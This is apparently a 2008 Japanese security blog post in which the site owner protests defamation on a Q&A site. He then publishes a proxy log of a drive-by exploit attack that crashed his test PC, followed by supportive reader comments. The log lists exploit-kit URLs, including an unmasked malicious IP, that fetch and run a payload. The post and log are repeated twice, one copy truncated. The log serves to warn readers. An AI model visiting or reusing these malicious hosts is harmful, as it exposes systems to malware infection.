こんにちは、スキルの無い管理人です。
OKWEBには、故意もしくはやらせてきな私的サイトへの誹謗中傷があります。
言葉足らずへの文面のみ捉えては、個別の言葉での攻撃を行う行為。
このサイトは利用の度合いによってはお金儲けにも利用されますし、何かを肯定する為の踏み台とされる事が多々有ります。とても残念に思う次第です。
私は個人的に万人様へわかりやすくレポートを行って参りましたが(サイトあかかげまるとKagemaru-infoをごらん頂ければ私の事が概ねご理解頂けると思います。)、このサイトだけを棚上げで中傷されるのは我慢なりません。
もしも万が一OKWEBへの転載を新規に見つけた場合が止まない場合このサイトは閉鎖します。
一部奇怪な文面と閉鎖基準を訂正変更させていただきました。また、サイト運営出来なくなる懸念も含んでおりますので、この場合予告無く掲載終了となります。
7月27日追記
少々気を取り直して、脆弱性攻撃のログをとる事が出来ましたので掲載させて頂きます。
OKWEBには、故意もしくはやらせてきな私的サイトへの誹謗中傷があります。
言葉足らずへの文面のみ捉えては、個別の言葉での攻撃を行う行為。
このサイトは利用の度合いによってはお金儲けにも利用されますし、何かを肯定する為の踏み台とされる事が多々有ります。とても残念に思う次第です。
私は個人的に万人様へわかりやすくレポートを行って参りましたが(サイトあかかげまるとKagemaru-infoをごらん頂ければ私の事が概ねご理解頂けると思います。)、このサイトだけを棚上げで中傷されるのは我慢なりません。
もしも万が一OKWEBへの転載
一部奇怪な文面と閉鎖基準を訂正変更させていただきました。また、サイト運営出来なくなる懸念も含んでおりますので、この場合予告無く掲載終了となります。
7月27日追記
少々気を取り直して、脆弱性攻撃のログをとる事が出来ましたので掲載させて頂きます。
凹む前の前日CA インターネット セキュリティ スイート プラス 2008のレポートを取ってみようと、脆弱性攻撃耐性をテストしていました所、見事にPCを落とされてしまう攻撃を受けました。
どう言った攻撃を受けるのか、Proxyサーバを経由で該当サイトを開いた時のアクセスログを取得したので、公開してみたいと思います。
サイトURLは危険なので公開出来ない旨ご了承願います。
トラップを仕込んでいるサイトを開くと、5行目までは普通にサイトデータを取得させている事をごらんいただけます。しかしながら6行目で何かの広告かリダイレクトされたのか(この時点でPCはシャットダウンされます)異なるアドレスからのデータを取得しにいく事を確認頂けます。
その上で、13行目でocget.dllを参照していることがわかります。ここに脆弱性があると言うことになります。16行目でウイルス本体を取り込んでPCがシャットダウンを引き起こしているものと考えられます。ウイルス本体配布元はマカフィーサイトアドバイザで参照頂けます。
2008/07/27(12:14:27) P-SV(HTTP) 192.168.1.21 [8080] .com [80] "GET http:.com/ HTTP/1.0"
2008/07/27(12:14:28) P-SV(HTTP) 192.168.1.21 [8080] .com [80] "GET http:.com/_themes/indust/indtextb.jpg HTTP/1.0"
2008/07/27(12:14:28) P-SV(HTTP) 192.168.1.21 [8080] .com [80] "GET http:.com/Cat_Cov_2.jpg HTTP/1.0"
2008/07/27(12:14:28) P-SV(HTTP) 192.168.1.21 [8080] .com [80] "GET http:.com/_derived/index.html_cmp_indust000_bnr.gif HTTP/1.0"
2008/07/27(12:14:28) P-SV(HTTP) 192.168.1.21 [8080] .com [80] "GET http:.com/_themes/indust/indhorsd.gif HTTP/1.0"
2008/07/27(12:14:28) P-SV(HTTP) 192.168.1.21 [8080] **.65.232.33 [80] "GET http://58.65.232.33/gpack/index.php?366645 HTTP/1.0"
2008/07/27(12:14:29) P-SV(HTTP) 192.168.1.21 [8080] .com [80] "GET http:com/_vti_bin/fpcount.exe/?Page=index.html|Image=4 HTTP/1.0"
2008/07/27(12:14:29) P-SV(HTTP) 192.168.1.21 [8080] **.65.232.33 [80] "GET http://**.65.232.33/gpack/index1.php HTTP/1.0"
2008/07/27(12:14:29) P-SV(HTTP) 192.168.1.21 [8080] **.65.232.33 [80] "GET http://**.65.232.33/01/01/update.php HTTP/1.0"
2008/07/27(12:14:29) P-SV(HTTP) 192.168.1.21 [8080] **.65.232.33 [80] "GET http://**.65.232.33/counter.php HTTP/1.0"
2008/07/27(12:14:29) P-SV(HTTP) 192.168.1.21 [8080] **.65.232.33 [80] "GET http://**.65.232.33/nonick/index.php HTTP/1.0"
2008/07/27(12:14:29) P-SV(HTTP) 192.168.1.21 [8080] **.65.232.33 [80] "GET http://**.65.232.33/counter.php?b=3 HTTP/1.0"
2008/07/27(12:14:30) P-SV(HTTP) 192.168.1.21 [8080] activex.microsoft.com [80] "POST http://activex.microsoft.com/objects/ocget.dll HTTP/1.0"
2008/07/27(12:14:30) P-SV(HTTP) 192.168.1.21 [8080] **.65.232.33 [80] "GET http://**.65.232.33/counter.php?a=3&c=3 HTTP/1.0"
2008/07/27(12:14:30) P-SV(HTTP) 192.168.1.21 [8080] codecs.microsoft.com [80] "POST http://codecs.microsoft.com/isapi/ocget.dll HTTP/1.0"
2008/07/27(12:14:30) P-SV(HTTP) 192.168.1.21 [8080] [80] "GET http://.biz/img/cmd.php?c=r&v=22&b=3002&id=DA92CF3&cnt=JPN&q=21D81 HTTP/1.0"
2008/07/27(12:14:31) P-SV(HTTP) 192.168.1.21 [8080] [80] "GET http://.biz/img/cmd.php?c=L1&s=112609030&h=136110950&v=22&b=3002&id=DA92CF3&cnt=JPN&q=21FF2 HTTP/1.0"
2008/07/27(12:14:32) P-SV(HTTP) 192.168.1.21 [8080] ***.117.111.46 [80] "GET http://***.117.111.46/banners/xp.php?b=3002 HTTP/1.0"
2008/07/27(12:14:33) P-SV(HTTP) 192.168.1.21 [8080] **.65.232.33 [80] "GET http://**.65.232.33/nonick/exploits.php?go=1 HTTP/1.0"
2008/07/27(12:14:33) P-SV(HTTP) 192.168.1.21 [8080] activex.microsoft.com [80] "POST http://activex.microsoft.com/objects/ocget.dll HTTP/1.0"
2008/07/27(12:14:33) P-SV(HTTP) 192.168.1.21 [8080] **.65.232.33 [80] "GET http://**.65.232.33/01/01/load.php HTTP/1.0"
一応上記の攻撃は、FireFox2.0では影響ありませんし、全てのOSで同懸念が発生するわけではないです。またCAでは防げなかったですが、ESET、ノートンインターネットセキュリティやAVIRA、カスペルスキーにウイルスセキュリティZERO、ウイルスバスターやGDATAはこういったWEBからの攻撃は防げますのでしっかりとした製品で対策している方は特に問題無いと言えます。
どう言った攻撃を受けるのか、Proxyサーバを経由で該当サイトを開いた時のアクセスログを取得したので、公開してみたいと思います。
サイトURLは危険なので公開出来ない旨ご了承願います。
トラップを仕込んでいるサイトを開くと、5行目までは普通にサイトデータを取得させている事をごらんいただけます。しかしながら6行目で何かの広告かリダイレクトされたのか(この時点でPCはシャットダウンされます)異なるアドレスからのデータを取得しにいく事を確認頂けます。
その上で、13行目でocget.dllを参照していることがわかります。ここに脆弱性があると言うことになります。16行目でウイルス本体を取り込んでPCがシャットダウンを引き起こしているものと考えられます。ウイルス本体配布元はマカフィーサイトアドバイザで参照頂けます。
2008/07/27(12:14:27) P-SV(HTTP) 192.168.1.21 [8080] .com [80] "GET http:.com/ HTTP/1.0"
2008/07/27(12:14:28) P-SV(HTTP) 192.168.1.21 [8080] .com [80] "GET http:.com/_themes/indust/indtextb.jpg HTTP/1.0"
2008/07/27(12:14:28) P-SV(HTTP) 192.168.1.21 [8080] .com [80] "GET http:.com/Cat_Cov_2.jpg HTTP/1.0"
2008/07/27(12:14:28) P-SV(HTTP) 192.168.1.21 [8080] .com [80] "GET http:.com/_derived/index.html_cmp_indust000_bnr.gif HTTP/1.0"
2008/07/27(12:14:28) P-SV(HTTP) 192.168.1.21 [8080] .com [80] "GET http:.com/_themes/indust/indhorsd.gif HTTP/1.0"
2008/07/27(12:14:28) P-SV(HTTP) 192.168.1.21 [8080] **.65.232.33 [80] "GET http://58.65.232.33/gpack/index.php?366645 HTTP/1.0"
2008/07/27(12:14:29) P-SV(HTTP) 192.168.1.21 [8080] .com [80] "GET http:com/_vti_bin/fpcount.exe/?Page=index.html|Image=4 HTTP/1.0"
2008/07/27(12:14:29) P-SV(HTTP) 192.168.1.21 [8080] **.65.232.33 [80] "GET http://**.65.232.33/gpack/index1.php HTTP/1.0"
2008/07/27(12:14:29) P-SV(HTTP) 192.168.1.21 [8080] **.65.232.33 [80] "GET http://**.65.232.33/01/01/update.php HTTP/1.0"
2008/07/27(12:14:29) P-SV(HTTP) 192.168.1.21 [8080] **.65.232.33 [80] "GET http://**.65.232.33/counter.php HTTP/1.0"
2008/07/27(12:14:29) P-SV(HTTP) 192.168.1.21 [8080] **.65.232.33 [80] "GET http://**.65.232.33/nonick/index.php HTTP/1.0"
2008/07/27(12:14:29) P-SV(HTTP) 192.168.1.21 [8080] **.65.232.33 [80] "GET http://**.65.232.33/counter.php?b=3 HTTP/1.0"
2008/07/27(12:14:30) P-SV(HTTP) 192.168.1.21 [8080] activex.microsoft.com [80] "POST http://activex.microsoft.com/objects/ocget.dll HTTP/1.0"
2008/07/27(12:14:30) P-SV(HTTP) 192.168.1.21 [8080] **.65.232.33 [80] "GET http://**.65.232.33/counter.php?a=3&c=3 HTTP/1.0"
2008/07/27(12:14:30) P-SV(HTTP) 192.168.1.21 [8080] codecs.microsoft.com [80] "POST http://codecs.microsoft.com/isapi/ocget.dll HTTP/1.0"
2008/07/27(12:14:30) P-SV(HTTP) 192.168.1.21 [8080] [80] "GET http://.biz/img/cmd.php?c=r&v=22&b=3002&id=DA92CF3&cnt=JPN&q=21D81 HTTP/1.0"
2008/07/27(12:14:31) P-SV(HTTP) 192.168.1.21 [8080] [80] "GET http://.biz/img/cmd.php?c=L1&s=112609030&h=136110950&v=22&b=3002&id=DA92CF3&cnt=JPN&q=21FF2 HTTP/1.0"
2008/07/27(12:14:32) P-SV(HTTP) 192.168.1.21 [8080] ***.117.111.46 [80] "GET http://***.117.111.46/banners/xp.php?b=3002 HTTP/1.0"
2008/07/27(12:14:33) P-SV(HTTP) 192.168.1.21 [8080] **.65.232.33 [80] "GET http://**.65.232.33/nonick/exploits.php?go=1 HTTP/1.0"
2008/07/27(12:14:33) P-SV(HTTP) 192.168.1.21 [8080] activex.microsoft.com [80] "POST http://activex.microsoft.com/objects/ocget.dll HTTP/1.0"
2008/07/27(12:14:33) P-SV(HTTP) 192.168.1.21 [8080] **.65.232.33 [80] "GET http://**.65.232.33/01/01/load.php HTTP/1.0"
一応上記の攻撃は、FireFox2.0では影響ありませんし、全てのOSで同懸念が発生するわけではないです。またCAでは防げなかったですが、ESET、ノートンインターネットセキュリティやAVIRA、カスペルスキーにウイルスセキュリティZERO、ウイルスバスターやGDATAはこういったWEBからの攻撃は防げますのでしっかりとした製品で対策している方は特に問題無いと言えます。
あかかげまる様
いつもお世話になってますダブルです。
お気持ち、お察し致します。
上記内容に関しては、あまり詳しい事は解りませんが、おおよその見当はつきます。もしこのサイトが閉鎖されてしまいますと、私的には非常に残念に思うと共に、とても困ってしまいます。
誰でも閲覧できる環境にあるネット上には十人十色、さまざまな人々が来ます。勿論どこのサイトにも誹謗中傷目的で足跡を残す輩が居る物です。これは我々が実際に暮らしている現実社会と全く同じですよね。
あかかげまる様のお気持ち、非常によく解ります。しかし、私の様にいつも新しいレポートや情報を楽しみにして訪れる者や、あかかげまる様に同調されておられる方々も沢山いる事を理解して頂けると幸いです。
それにしても、何か良い方法は無いものでしょうか・・・残念でなりません!
ダブル様 お世話になります。昔もたくさん嫌がらせがありました。特に私も好んでレポートしているわけではないですので、ちょうどいい時期かもしれません。
こんにちは。
いつもお世話になっています。
善意で行っている事に対し誹謗中傷されるのは
本当に困りますね。
心中お察し致します。
OKWEBに限らず他サイトへの資料の少なくとも無断転載を
禁じる旨サイトのタイトル付近等のわかりやすく目につき
やすいところに明記してはどうでしょうか。
八百萬神様 こんにちわ。こちらこそお世話になります。一応無断転載禁止を設置させていただきました。ご提案誠に感謝致します。
管理人さん、こんにちは。
OKWEBなるサイトは聞いたことはあるのですが、そんなにひどいのですか?
このほかにもいくつかの似たような相談・質問サイトがあるようですが、他と比べてどうなんでしょう?
サイト的には、全く趣が違いますが、ネットワークセキュリティ2ちゃんねるは見ていて、不愉快なコメントも多いので、最近はまったく見ることもなくなりましたが・・・。
でも、今入れているセキュリティソフトで、役に立っているものの多くは、ここで紹介されていて使うようになったものですし(SafeSpaceやK9 Web Protectionなんかは、ホント良いソフトだと思います)、このサイト、どうか閉鎖しないようお願いします。
サイン様 お世話になります。放置していた自分が悪いのかもしれませんね。一応phpで動くBBSがあったので(このホスティングCGIを許可されてないんです)、これを設置してお困りの方はOKではなく当サイトフォロー入れて何とか名誉回復を図り、中傷行為がなくなるかを様子見したいと思います。また転載禁止の旨を目に付きやすい場所に設置し、もしも無断転載あればOKWEBへクレームを入れて対処して頂き様子見してみます。
お察し申し上げます。このサイトの質の高さに常々敬意を表している者です。
私もこのサイトでK9 Web Protectionを知り使わせていただいています。
私にはできることがないのが残念ですが、一時期マイクロソフトの運営するサイトで心無い者たちによる問題が生じ、リニューアルに相当期間かかりましたが、万全とはいえないまでもかなり改善された例もあります。
何らかの対応をされ、今後も今やなくてはならないインターネット利用の安全を図るためにもお力をいただきたいと思います。
おはようございます。
心無い一部の人達が、別のサイトで誹謗中傷を繰り返して
いることには本当に腹が立ちます。
私も以前PC総合講座をSNS内でやらせていただいてましたが、
心無い物の「誹謗中傷」に疲れ果て2年前に閉鎖をしてしまいました。
(なので、心中お察しいたします。)
その後も、当時読者様からの暖かい励ましのメールを今でも沢山頂きます。
今となっては、「もう少し頑張れば・・・。」と後悔しています。
私たちは、管理人さんの「スキルの高さと的確な行動力・アドバイス」に沢山の事を学ぶことが
でき感謝しています。
どうぞ、一部の心無い物の行動に屈せずこれからも続けて頂きたく思います。
draco様 お世話になります。マイクロソフトのQAサービスもこういった問題が発生していたんですね。教えて頂いてありがとうございます。一応対応策としてOKWEB側へクレームしてみるつもりです。アドバイス誠に感謝致します。
leon様 お世話になります。昔leon様へ気にしていないと言っていたのに当の本人が気にしてしまってはと情けなく思います。SNSでの誹謗中傷経験談ありがとうございます。SNSでもそんな嫌がらせが存在するなんて、ネットの使い方そのものが何か根本的に間違えてしまっているんですよね。これからも何とか続けられるだけ続けてみようと思うのですが、皆様のお力が必要になります。今後ともご指導の程よろしくお願い申し上げます。
常に参考にしているサイトなので、閉鎖は悲しいですね。
私も掲示板での誹謗中傷は経験が有りますが、あれはキツイですね。
常に反撃するか、徹底的に無視するかの選択ですから。
堅実なこのサイトは続けて欲しいと思っております。
流浪人 様 お世話になります。昔からサイト間もしくは別サイトでの案内でクレーム頂いた際は、何とか私的な対処方法がありましたが、直接的に話す事も出来ない相手しかも一度も交わった事が無いインターネットユーザー様からの言われのない誹謗中傷は特に辛いです。これで三回目ですね、誹謗中傷で閉鎖予告。資質的に閲覧ユーザー様へのフォロー等が無いのが原因なのかもしれません。この部分を何とか改善し、なるべく継続.運営をと思う次第です。お気遣いさせてしまい、申し訳なく思うと共に皆様の暖かいお言葉とても感謝致します。
OKWebでは、ここを紹介させていただいたこともありますけど、後の結果を考えれば配慮のないことと、申し訳なく思います。
誰にも知らせず「勝手に」見るだけにしておけば良かったです。
紹介した責任もあって、運営会社には抗議したのですけど、他人のページを批判してはいけないという規則がないから、直接悪口を言っても処分できないし謝罪もしないという返事で、驚くやら呆れるやらでした。
そのくせ、ジャニーズネタなど、うるさいサイトの話題は自主規制が厳しくて、さほど問題ないことでも削除します。
本当にここは、あかかげまるさんの人柄が察しられる、気持ちの良いページなので、閉鎖されないように小生も微力ながら応援したいと思います。
今後、おかしな形でここが利用されたら、やはり主として、直接抗議が良いのかも知れません。
TURURINさん自分もつい最近までここのサイトのURL等をOKwebに記載してました。
OKweb等で困ってる方の力になれればと言う気持ちで記載していたのですが、こんな事になろうとは思いませんでした。
自分も本当にここのサイトの管理人さんは凄く良い人で色々な知識も教えていただきました。
どこ世にも人の上げ足とったり裏で工作したりする人ばかりですね、嫌な世の中です。
自分も大工の棟梁なのですが、建築業界不景気の中遊ばないで良い様に仕事を回してもらってますが、暇だと言う大工で使ってくれと言うので使うと裏で直接監督等に営業かけたりする方もいます。
本当に嫌な世の中です。
OKweb等ももう少し人を中傷したりする書き込みの規制をして欲しいものです。
今は自分もOKwebにはPC初心者なりの回答やアドバイスですがしていません。
本当にこのサイトを閉鎖してほしくないものですから。
TURURIN様 e-kun様 お世話になります。こちらこそ気を使わせてしまって申し訳ありません。私一人が運営している部分に問題があるのかもしれないです。別のサイトでもよくある事なのですが(ルータ関係)、無数にある機種と混同してしまって誤案内等が結構あります。ただこの時は相手側とは一対なので、誤案内が生じた場合は出来ない旨の連絡がありそれに即時対応することが出来るのですが、このサイトの場合は複数の方がそれぞれ異なる環境で参照頂いています。私のテスト環境とは別の環境だと、レポートの資料と相違が生じてしまう事がありそれが不満を発生している可能性がありそうです。これを回避する為に、BBSを設置で他ユーザー様のアフターも行ってみたいと思う所存です。もしもお困りの方がBBSへご相談あった場合は皆様のお力をお借りしたく願う次第です。
はじめまして。sakuといいます。実は私もむこうで回答などの時にこちら様の記事を参考として紹介した事があります。
直接の事は知りませんでしたが、過去の質問を見て分かってしまいました。馬鹿にした言い方だと思いました。
最近、あのカテは異様な雰囲気ですのであまり気にせず、早く忘れてほしいです。
最後に、閉鎖などいわずに、ぜひひっそりとでも良いので続けてほしいです。
saku様 はじめまして。コメント頂いてありがとうございます。QAサイトで私のサイトを名指してけなす行為は今思い出しても頭に血が上りますが、なるべく私の頭を冷やす様勤めています。なるべく新たなレポートを更新して嫌な事を払拭したいと思います。お気遣い感謝するとともにご連絡ありがとうございました。